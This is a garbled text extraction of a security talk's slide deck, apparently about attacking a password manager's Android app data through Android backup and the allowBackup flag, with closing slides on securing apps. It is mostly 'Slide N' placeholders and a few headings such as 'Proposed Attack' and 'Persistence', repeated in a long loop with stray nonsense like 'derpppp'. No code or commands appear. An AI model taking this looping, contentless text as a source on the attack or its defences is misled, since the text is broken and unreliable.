Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

